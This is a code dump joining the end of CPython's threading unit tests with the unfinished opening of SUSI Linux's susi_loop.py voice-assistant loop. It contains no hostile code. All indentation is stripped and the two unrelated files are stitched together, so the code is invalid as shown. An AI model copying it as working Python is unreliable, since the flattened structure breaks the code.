t.getName()
t.setName("name")
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
support.wait_process(pid, exitcode=10)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
from test import support
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
support.wait_process(pid, exitcode=0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
from test import support
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
support.wait_process(pid, exitcode=0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=support.SHORT_TIMEOUT), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
def test_locals_at_exit(self):
# bpo-19466: thread locals must not be deleted before destructors
# are called
rc, out, err = assert_python_ok("-c", """if 1:
import threading
class Atexit:
def __del__(self):
print("thread_dict.atexit = %r" % thread_dict.atexit)
thread_dict = threading.local()
thread_dict.atexit = "value"
atexit = Atexit()
""")
self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'value'")
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
from test import support
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
from test import support
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
support.wait_process(pid, exitcode=50)
else:
os._exit(50)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(51)
else:
os._exit(52)
else:
support.wait_process(pid, exitcode=51)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def pipe(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
if hasattr(os, 'set_blocking'):
os.set_blocking(r, False)
return (r, w)
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = f"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep({test.support.SHORT_TIMEOUT})
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
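# --- Editor's note: a minimal, hedged sketch (standalone, not part of the test
# classes above) of basic threading.Timer usage, the API TimerTests exercises:
# the callable fires once after the interval, and cancel() stops it beforehand.
def demo_timer_usage():
    import threading
    fired = threading.Event()
    timer = threading.Timer(0.05, fired.set)
    timer.start()
    fired.wait(timeout=1.0)
    timer.join()
    return fired.is_set()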
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
class AtexitTests(unittest.TestCase):
def test_atexit_output(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
def run_last():
print('parrot')
threading._register_atexit(run_last)
""")
self.assertFalse(err)
self.assertEqual(out.strip(), b'parrot')
def test_atexit_called_once(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
from unittest.mock import Mock
mock = Mock()
threading._register_atexit(mock)
mock.assert_not_called()
# force early shutdown to ensure it was called once
threading._shutdown()
mock.assert_called_once()
""")
self.assertFalse(err)
def test_atexit_after_shutdown(self):
# The only way to do this is by registering an atexit within
# an atexit, which is intended to raise an exception.
rc, out, err = assert_python_ok("-c", """if True:
import threading
def func():
pass
def run_last():
threading._register_atexit(func)
threading._register_atexit(run_last)
""")
self.assertTrue(err)
self.assertIn("RuntimeError: can't register atexit after shutdown",
err.decode())
if __name__ == "__main__":
unittest.main()
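# --- Editor's note: a minimal, hedged sketch (not part of the test suite above)
# of the threading.excepthook protocol that ExceptHookTests relies on: the hook
# receives an args object with exc_type, exc_value, exc_traceback and thread
# attributes. Names here are illustrative only.
def demo_custom_excepthook():
    import threading

    def hook(args):
        # args.thread can be None when the hook fires very late during shutdown.
        name = args.thread.name if args.thread is not None else "<unknown>"
        print(f"caught {args.exc_type.__name__} in {name}: {args.exc_value}")

    old_hook = threading.excepthook
    threading.excepthook = hook
    try:
        t = threading.Thread(target=lambda: 1 / 0, name="demo-thread")
        t.start()
        t.join()
    finally:
        threading.excepthook = old_hook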
|
susi_loop.py
|
"""
Processing logic of susi_linux
"""
import time
import os
import re
import logging
import queue
from threading import Thread, Timer, current_thread
from datetime import datetime
from urllib.parse import urljoin
import speech_recognition as sr
import requests
import json_config
import speech_recognition
from speech_recognition import Recognizer, Microphone
# from requests.exceptions import ConnectionError
import susi_python as susi
from .hardware_components.lights import lights
from .internet_test import internet_on
from .action_scheduler import ActionScheduler
from .player import player
from susi_config import SusiConfig
from .speech import TTS
logger = logging.getLogger(__name__)
try:
import RPi.GPIO as GPIO
except ImportError:
logger.warning("This device doesn't have GPIO port")
GPIO = None
class SusiLoop():
"""The main SUSI loop dealing with hotword detection, voice recognition,
server communication, action processing, etc"""
def __init__(self, renderer=None):
if GPIO:
try:
GPIO.setmode(GPIO.BCM)
GPIO.setup(27, GPIO.OUT)
GPIO.setup(22, GPIO.OUT)
except RuntimeError as e:
logger.error(e)
thread1 = Thread(target=self.server_checker, name="ServerCheckerThread")
thread1.daemon = True
thread1.start()
recognizer = Recognizer()
# this was False in the old state machine, but reading the API docs
# https://github.com/Uberi/speech_recognition/blob/master/reference/library-reference.rst
# it seems that True is actually better!
recognizer.dynamic_energy_threshold = True
recognizer.energy_threshold = 2000
self.recognizer = recognizer
self.susi = susi
self.renderer = renderer
self.server_url = "https://127.0.0.1:4000"
self.action_scheduler = ActionScheduler()
self.action_scheduler.start()
self.event_queue = queue.Queue()
self.idle = True
self.supported_languages = None
try:
res = requests.get('http://ip-api.com/json').json()
self.susi.update_location(
longitude=res['lon'], latitude=res['lat'],
country_name=res['country'], country_code=res['countryCode'])
except ConnectionError as e:
logger.error(e)
self.susi_config = SusiConfig()
self.path_base = self.susi_config.get('path.base')
self.sound_detection = os.path.abspath(
os.path.join(self.path_base,
self.susi_config.get('path.sound.detection')))
self.sound_problem = os.path.abspath(
os.path.join(self.path_base,
self.susi_config.get('path.sound.problem')))
self.sound_error_recognition = os.path.abspath(
os.path.join(self.path_base,
self.susi_config.get('path.sound.error.recognition')))
self.sound_error_timeout = os.path.abspath(
os.path.join(self.path_base,
self.susi_config.get('path.sound.error.timeout')))
if self.susi_config.get('susi.mode') == 'authenticated':
try:
susi.sign_in(email=self.susi_config.get('susi.user'),
password=self.susi_config.get('susi.pass'))
except Exception as e:
logger.error('Some error occurred during login. Check your login details with susi-config.\n%s', e)
if self.susi_config.get('hotword.engine') == 'Snowboy':
from .hotword_engine.snowboy_detector import SnowboyDetector
hotword_model = "susi.pmdl"
if self.susi_config.get('hotword.model'):
logger.debug("Using configured hotword model: " + self.susi_config.get('hotword.model'))
hotword_model = self.susi_config.get('hotword.model')
self.hotword_detector = SnowboyDetector(model=hotword_model)
elif self.susi_config.get('hotword.engine') == 'PocketSphinx':
from .hotword_engine.sphinx_detector import PocketSphinxDetector
self.hotword_detector = PocketSphinxDetector()
elif self.susi_config.get('hotword.engine') == 'None':
self.hotword_detector = None
else:
raise ValueError(f"Unrecognized value for hotword.engine: {self.susi_config.get('hotword.engine')}")
if self.susi_config.get('wakebutton') == 'enabled':
logger.info("Susi has the wake button enabled")
if self.susi_config.get('device') == 'RaspberryPi':
logger.info("Susi runs on a RaspberryPi")
from .hardware_components.rpi_wake_button import RaspberryPiWakeButton
self.wake_button = RaspberryPiWakeButton()
else:
logger.warning("Susi is not running on a RaspberryPi")
self.wake_button = None
else:
logger.warning("Susi has the wake button disabled")
self.wake_button = None
stt = self.susi_config.get('stt')
if stt == 'google' or stt == 'watson' or stt == 'bing':
# for internet based services we assume any language supported
self.supported_languages = None
elif stt == 'pocketsphinx':
ps_data_dir = os.path.join(os.path.dirname(os.path.realpath(speech_recognition.__file__)), "pocketsphinx-data")
self.supported_languages = [ f.name for f in os.scandir(ps_data_dir) if f.is_dir() ]
logger.debug(f"Found supported languages for PocketSphinx: {self.supported_languages}")
elif stt == 'deepspeech-local':
ps_data_dir = os.path.join(os.path.dirname(os.path.realpath(speech_recognition.__file__)), "deepspeech-data")
self.supported_languages = [ f.name for f in os.scandir(ps_data_dir) if f.is_dir() ]
logger.debug(f"Found supported languages for DeepSpeech: {self.supported_languages}")
else:
self.supported_languages = None
logger.warn(f"Unknown stt setting: {stt}")
if self.susi_config.get('stt') == 'deepspeech-local':
self.microphone = Microphone(sample_rate=16000)
else:
self.microphone = Microphone()
if self.hotword_detector is not None:
self.hotword_detector.subject.subscribe(
on_next=lambda x: self.hotword_detected_callback())
if self.wake_button is not None:
self.wake_button.subject.subscribe(
on_next=lambda x: self.hotword_detected_callback())
if self.renderer is not None:
self.renderer.subject.subscribe(
on_next=lambda x: self.hotword_detected_callback())
if self.action_scheduler is not None:
self.action_scheduler.subject.subscribe(
on_next=lambda x: self.queue_event(x))
def queue_event(self, event):
""" queue a delayed event"""
self.event_queue.put(event)
def hotword_listener(self):
""" thread function for listening to the hotword"""
# this function never returns ...
self.hotword_detector.start()
def server_checker(self):
""" thread function for checking the used server being alive"""
response_one = None
test_params = {
'q': 'Hello',
'timezoneOffset': int(time.timezone / 60)
}
while response_one is None:
try:
logger.debug("checking for local server")
url = urljoin(self.server_url, '/susi/chat.json')
response_one = requests.get(url, params=test_params)
api_endpoint = self.server_url
susi.use_api_endpoint(api_endpoint)
except AttributeError:
time.sleep(10)
continue
except ConnectionError:
time.sleep(10)
continue
def start(self, background = False):
""" start processing of audio events """
if self.hotword_detector is not None:
hotword_thread = Thread(target=self.hotword_listener, name="HotwordDetectorThread")
hotword_thread.daemon = True
hotword_thread.start()
if background:
queue_loop_thread = Thread(target=self.queue_loop, name="QueueLoopThread")
queue_loop_thread.daemon = True
queue_loop_thread.start()
else:
self.queue_loop()
def queue_loop(self):
while True:
# block until events are available
ev = self.event_queue.get(block = True)
logger.debug("Got event from event queue, trying to deal with it")
# wait until idle
while True:
logger.debug("Waiting to become idle for planned action")
if not self.idle:
time.sleep(1)
continue
logger.debug("We are idle now ...")
self.idle = False
self.deal_with_answer(ev)
# back from processing
player.restore_softvolume()
if GPIO:
try:
GPIO.output(27, False)
GPIO.output(22, False)
except RuntimeError:
pass
self.idle = True
break
def notify_renderer(self, message, payload=None):
""" notify program renderer """
if self.renderer is not None:
self.renderer.receive_message(message, payload)
def hotword_detected_callback(self):
"""
Callback invoked when the hotword is detected. Runs the full processing
logic that was formerly split across separate states.
"""
logger.debug("Entering hotword callback")
# don't do anything if we are already busy
if not self.idle:
logger.debug("Callback called while already busy, returning immediately from callback")
return
logger.debug("We are idle, so work on it!")
